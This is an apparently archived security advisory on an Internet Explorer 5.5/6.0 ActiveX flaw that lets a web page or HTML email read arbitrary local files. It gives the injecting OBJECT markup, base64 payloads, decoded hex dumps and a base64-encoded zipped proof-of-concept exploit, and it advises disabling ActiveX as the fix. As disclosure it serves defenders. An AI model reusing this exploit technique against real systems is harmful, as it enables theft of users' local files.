COMMAND

	IE ActiveX gives full control over PC

SYSTEMS AFFECTED

	 Windows 2000 pro, IE 5.50 

	 Windows 2000 pro SP2, IE 6.0, fully patched

	 Windows XP pro, IE 6.0

	 All other versions maybe at risk too

PROBLEM

	Markus Kern posted :
	

	There is a  vulnerability  in  MS  Internet  Explorer  that  allows  any
	webpage or HTML email to read arbitrary local files. This bug  may  also
	lead to remote command execution.
	

	The exploit is based on a very vague advisory postet to
	 

	vuln-dev@securityfocus.com by NOMEN NESCIO SECURITY ALERT

	<hush.little.baby@hushmail.com> on 21/11/2001:

	http://www.securityfocus.com/archive/82/241482

	

	

	

	Marc Fossi  <mfossi@securityfocus.com>  suggests  that  this  may  be
	another way  to  exploit  an  old  vulnerability  discovered  by  Georgi
	Guninski: http://www.securityfocus.com/bid/1718
	

	

	First we create either a \"htmlfile_FullWindowEmbed\" or a  \"htmlfile\"
	object (both work):
	 

	<OBJECT ID=\"myObject\"

	CLASSID=\"CLSID:25336921-03F9-11CF-8FD0-00AA00686F13\">

	</OBJECT>

	

	Ok, alert(myObject.outerHTML); gives us the following:
	 

	<OBJECT id=myObject

	classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13

	data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw

	OzwvcD4= ></OBJECT>

	

	Decoding the Base64 string we get (hex dump):
	 

	20693325F903CF11 8FD000AA00686F13  .i3%.........ho.

	3C703E266E627370 3B3C2F703E        <p>&nbsp;</p>

	

	The first part is a GUID and the second one looks like HTML.  We  inject
	the string
	 

	\"<script>document.location.href=\"file://c:\\\\test.txt\";</script>\"

	

	into the object using
	 

	<OBJECT ID=\"myObject\"

	CLASSID=\"CLSID:25336921-03F9-11CF-8FD0-00AA00686F13\"

	data=\"data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+

	ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+\">

	</OBJECT>

	

	(There are probably easier ways to do this but I\'m  not  very  familiar
	with IE coding).
	

	Now to the the interesting part. After c:\\test.txt  is  loaded  we  can
	still access the data parameter of the object using  myObject.outerHTML.
	This time it contains the Base64 encoded version of  c:\\test.txt  among
	other things.
	

	So doing a alert(myObject.outerHTML); after the local file is loaded  we
	get:
	 

	<OBJECT id=myObject

	classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13

	data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV

	FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9

	FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb

	nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0R

	ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K ></OBJECT>

	

	with the Base64 string decoding to:
	 

	20693325F903CF11 8FD000AA00686F13  .i3%.........ho.

	3C21444F43545950 452048544D4C2050  <!DOCTYPE.HTML.P

	55424C494320222D 2F2F5733432F2F44  UBLIC.\"-//W3C//D

	54442048544D4C20 342E30205472616E  TD.HTML.4.0.Tran

	736974696F6E616C 2F2F454E223E0D0A  sitional//EN\">..

	3C48544D4C3E3C48 4541443E0D0A3C4D  <HTML><HEAD>..<M

	4554412068747470 2D65717569763D43  ETA.http-equiv=C

	6F6E74656E742D54 79706520636F6E74  ontent-Type.cont

	656E743D22746578 742F68746D6C3B20  ent=\"text/html;.

	636861727365743D 77696E646F77732D  charset=windows-

	31323532223E3C2F 484541443E0D0A3C  1252\"></HEAD>..<

	424F44593E3C584D 503E68656C6C6F20  BODY><XMP>hello.

	776F726C643C2F58 4D503E3C2F424F44  world</XMP></BOD

	593E3C2F48544D4C 3E0D0A            Y></HTML>..    

	

	where \"hello world\" is the contents of c:\\test.txt.
	

	It all boils down to an ordinary DOM circumvention with  all  the  usual
	implications.
	

	

	Proof of concept exploit ------------------------
	

	Attached is a zipped HTML file that reads c:\\test.txt and displays it.
	 

	------------5B232175B41C08

	Content-Type: application/x-zip-compressed; name=\"htmlfile_FWE-exploit.zip\"

	Content-Transfer-Encoding: base64

	Content-Disposition: attachment; filename=\"htmlfile_FWE-exploit.zip\"

	

	UEsDBBQAAAAIAL2EdysZfst8lwQAACoJAAAYAAAAaHRtbGZpbGVfRldFLWV4cGxvaXQuaHRtnVZt

	T+pKEP5Own8YmxwpAfoKC8hLgoUCxnP1KIlKTnJT2kWqpe1plxe9+t/vbFtEPXhucknTLp15np19

	dnam7dHk+3k3n2sfVSow9hmNfMpgsA29IKIRLNjSm7se/dtced6N6zvBZrCcUQfCKAjmgJcd+DYN

	GVAOcZkEslypcMLTi/5dRpzPTRYUHItZEFqRtaQ4DcQscv17cGNgaDy1YkqqQH07cJB+TaPYDXyc

	IJ/L5zSFNEHXtRqYTUUHw1RVaJh9BRSl18MbaQAxVR3A1b9Ju98ikPI53ajrQPS6BqRZV6Be1QdA

	qsTk72pA+gRvg3oV2rEduSHrOoG9WlKf4ZwDYiArQbiKDqTJQQMN4Q3OViME9L6mgeQFtsUwVmkR

	0XlHyOcIwWiJgdR6TzNB4xx6r2ZAzeBENYyoXkUiruuJLNsnP38yGjOMtl6tN7hNA/1UNxD5e/DJ

	j22Z0GrLWcwA+VwmOsp9cXo2MCYw7neE5dPF7IHaTICbcX8y6uiKAqPBeDiadLSaAsZ57/qa+xnn

	+DjRarpOmppaUXSzWVFVw6xwjStcYy4xV1hINrEj8PuJFYaem65d3lYCjwbJbK1ZspXl8fDx+Wz+

	2H/eDi+VnvGrN1ysB8/b5zv9LLRHP0rTYfPBuVG9mf9jNcPx3e1VONOqK2t05k0fFHe69OLpJFif

	a9/JrblVprd/Kef+VdUxxvVLo/nGI/Akk9NlpxJcG1fjSz6W5V1eOZTnVQQoWIjpNY+CJVwFMxox

	GEbWwloWYkzNewoWw5xnIe7LZrORosTlPvGQ7GApsyDwYjldYcIo8ROSz81Xvs2FgOVTOmM/mVDE

	JC/mc//kc2sLJ6fxymPQAUEog4tPpQzbMsQLd84iep++sIOVz30qaiufS7cb6YMIRLejtBDW5idH

	8qh/zxb4v1QqAvKDjRhusBdW1GOiW+Rwdw5ioVeAdgftx8d4w1FhWihy6u07hIHBJiioYIZyKPVi

	muKtz/jnP+ObdSiBRj6SKJ9Jmn8mqTaQpKZ9IMElIrC0B5JDdvmdXd/Z+RusVMz1V7TFkyTVuVTi

	DvHGZfYC8Yn036CaKgo27iQoJ8k2vNukbbox7+gyVzV1XaOPuPNvt7UivIC4hW4XiVu/kcExKFvF

	TA2ziFqPe0LtIGF1T6h9SagfJNQPEpI9ofIlofKJ8DVLL3GNGalr8PKCtF1QNWTDTcbXRx2Ocz7+

	tYqZuG+HIRuUQGgLrS8siqrp1RqpN5q9U6M/MIVdmotrWSXFY65g8X+B/wPbTUJ6TXPsi7ivk0Ym

	8ZpiZFksrouZRnhFlK0iP/OXWJD6i9zjlafiW+24opZjYlMQ05IBfd4wO7Ar41Kwwr7J+3Vrb+QP

	KV7N8AyJyRh7NN1ezEWB11+hWGxhQ8YTZmGlw269669p8z1Mo5Q/EsGOhfrOQQ7LwyIpfqp8nCPD

	pcUXLIQ7bhx61lO28hRYMDCnGE0+A3hPhLeOiH0uQbkMNq7nwYyiipZzVODaxZRN3CVFUURhr1xL

	KGObS9JYlt+77IL8rCVHaBmCN5K35tGWd18wcvKN9C9QSwECFAAUAAAACAC9hHcrGX7LfJcEAAAq

	CQAAGAAAAAAAAAABACAAtoEAAAAAaHRtbGZpbGVfRldFLWV4cGxvaXQuaHRtUEsFBgAAAAABAAEA

	RgAAAM0EAAAAAA==

	

	------------5B232175B41C08--

	

SOLUTION

	Disable ActiveX in Internet Explorer